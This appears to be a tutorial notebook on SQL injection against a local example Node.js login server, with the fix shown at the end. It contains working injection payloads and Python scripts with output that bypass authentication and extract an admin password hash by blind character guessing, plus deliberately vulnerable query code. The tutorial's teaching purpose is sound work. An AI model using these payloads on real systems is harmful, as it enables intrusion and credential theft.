# SQL Injection

Let's start by focusing in on this code snippet, starting at line 20 of the example server code:
```js
// Check the database for a user with the same username and password hash:
db.query("SELECT * FROM users WHERE username='" + req.params.user + "' AND pwdhash='" + hash + "'", (err, users) => {
	// ...
});
```

Notice here that we are building our SQL query by concatenating a series of un-escaped strings.
This is ripe for a type of attack known as *SQL injection*, in which the attacker sends the server a
maliciously crafted set of inputs which are designed to trigger a malicious SQL command.

## Total Password Bypass

For example, consider the inputs `req.params.user = 'admin'`, with a password hash `hash = '0cc175b9c0f1b6a831c399e269772661'`.
This would result in the following SQL query:
```sql
SELECT * FROM users WHERE username='admin' AND pwdhash='0cc175b9c0f1b6a831c399e269772661'
```

However, if instead of the `admin` user, we send a malicious input `admin'--`, we get the following SQL command:
```sql
SELECT * FROM users WHERE username='admin'--' AND pwdhash='0cc175b9c0f1b6a831c399e269772661'
```
Note here that `--` is the SQL equivalent of `//`. IE, it comments out the rest of the line.

Let's test this using python:

In [2]:
# Import dependencies:
from aiohttp import ClientSession
from timeit import default_timer as timer
from urllib import parse

# Establish some basic info on the target:
host = 'localhost:8081'
user = 'admin'

# Define an async wrapper function to run the attack:
async def attack():
	# Prepare the HTTP session:
	async with ClientSession() as session:

		# Construct & send a SQL-Injection attack to obtain an authorization token:
		injection = parse.quote("{user}'--".format(user=user))
		url = 'http://{host}/login/{user}/a'.format(host=host, user=injection)
		print('Injection URL: {url}'.format(url=url))
		res = await session.get(url)
		print(await res.text() + '\n')

		# Print out the session's cookie details:
		if len(session.cookie_jar) > 0:
			for cookie in session.cookie_jar:
				print("Cookie '{key}' has value \"{value}\"".format(key=cookie.key, value=cookie.value))
		else:
			print('ERROR: Failed to extract cookies from response')

		# Try to read the secret value:
		url = 'http://{host}/secret'.format(host=host)
		res = await session.get(url)
		print('\nSecret: ' + await res.text())

# Execute the attack function:
start = timer()
await attack()
print('\nTime elapsed: {time} seconds'.format(time=timer() - start))

Injection URL: http://localhost:8081/login/admin%27--/a
Authentication succeeded!

Cookie 'user' has value "admin'--"
Cookie 'token' has value "0"

Secret: The secret word is "xylophone"

Time elapsed: 0.12642341299988402 seconds


As you can see, desipte feeding in an invalid username/password pair (trust us - the password wasn't just "a"),
the attack was still able to secure a valid session token, which it was then able to use to read secret information
from the server.

For most purposes, this kind of exploit is game-over.
The attackers have stolen your secrets and pulled out of your network, without leaving a trace.
However, things can (and *will*) still get worse.

Notice how the "user" cookie isn't listed as "admin", but is in fact "admin'--" what this means is that,
although the attacker is able to steal secrets available to any logged-in user, they don't actually have access
to the "admin" account - only a fake account with a very similar username.

## Stealing Passwords

To properly get into the admin account, we'll need to steal their password.
Let's start by trying to extract the password hash.

We'll need to craft a special SQL query to incrementally extract information about their password hash,
which will eventually allow us to reconstruct the full hash after a number of iterations.
Let's refresh ourselves on the structure of the SQL query we're working with:

```sql
SELECT * FROM users WHERE username='admin' AND pwdhash='0cc175b9c0f1b6a831c399e269772661'
```

Given that the output of this API query is binary (the login process either succeeds or it doesn't), it's not immediately clear how we can use this to return useful information about the password hash.
However, we can actually use this binary output to our advantage by structuring the query such that it
only succeeds if we are able to correctly guess some important information about the hash.
Specifically, we'll be guessing the hash string itself, one character at a time.

Using the username template `admin' AND substring(pwdhash from {index} for 1)='{guess}'--`, where we replace `{index}` with the index of the character within the string we are guessing, and `{guess}` with the guessed character, we can force the query to succeed only when we guess the correct character:

```sql
SELECT * FROM users WHERE username='admin' AND substring(pwdhash from 1 for 1)='0'--' AND pwdhash='0cc175b9c0f1b6a831c399e269772661'
```

Let's test this extraction method with some more python code:

In [11]:
# Define a set of global state variables:
total_requests=0
pwdhash = ''

# Define a function to guess one digit of the hash:
async def check_guess(session, index, guess):
	global total_requests, pwdhash

	# Update the CLI output:
	print('Dialing hash ... {pwdhash}'.format(pwdhash=pwdhash + guess), sep='', end='\r')

	# Construct & send a SQL-Injection attack to extract the user's password hash:
	injection = parse.quote("{user}' AND substring(pwdhash from {index} for 1)='{guess}'--".format(user=user, index=index, guess=guess))
	url = 'http://{host}/login/{injection}/a'.format(host=host, injection=injection)
	res = await session.get(url)
	total_requests += 1

	# Return the request status:
	return res.status

# Define an async wrapper function to run the attack:
async def attack():
	global pwdhash

	# Prepare the HTTP Session:
	async with ClientSession() as session:

		# Loop through each character in the hash:
		for index in range(1, 33):
			# Loop through each possible character in the hash:
			for guess in '0123456789abcde':
				status = await check_guess(session, index, guess)

				# Check whether or not the guess for the current digit was correct:
				if status == 200:
					pwdhash += guess
					print('Dialing hash ... {pwdhash}'.format(pwdhash=pwdhash), sep='', end='\r')
					break
			# If the character isn't 0-9 or a-e, it must be 'f':
			else:
				pwdhash += 'f'
				print('Dialing hash ... {pwdhash}'.format(pwdhash=pwdhash), sep='', end='\r')


	print()
	print("Extracted Hash: '{pwdhash}'".format(pwdhash=pwdhash))

# Execute the attack function:
start = timer()
await attack()
print('\nTime elapsed: {time} seconds'.format(time=timer() - start))
print('Total requests sent: {total}'.format(total=total_requests))


Dialing hash ... 1a1dc91c907325c69271ddf0c944bc72
Extracted Hash: '1a1dc91c907325c69271ddf0c944bc72'

Time elapsed: 7.059224237003946 seconds
Total requests sent: 255


And just like that, in just a few short seconds, we've managed to steal the `admin` user's password hash from the database.
Now, this attack does leave a **much** larger footprint (nearly 260 distinct HTTP requests),
which might tip-off the server owner to the attack, but probably not before you're able to crack their password
and infultrate the application.

## Avoiding SQL Injection

As the application developer, it is always important to ensure you read the documentation on the tools you use,
and make sure you understand how they are intended to be used.
In the case of the [`pg` package](https://node-postgres.com), the very first page of documentation explains how to
safely pass varibles to SQL queries:
```js
// Check the database for a user with the same username and password hash:
db.query("SELECT * FROM users WHERE username=$1 AND pwdhash=$2", [ req.params.user, hash ], (err, users) => {
	// ...
});
```

Just like that, our application is no longer vulnerable to these attacks.
That said, it's still vulnerable to a whole slew of other kinds of attacks.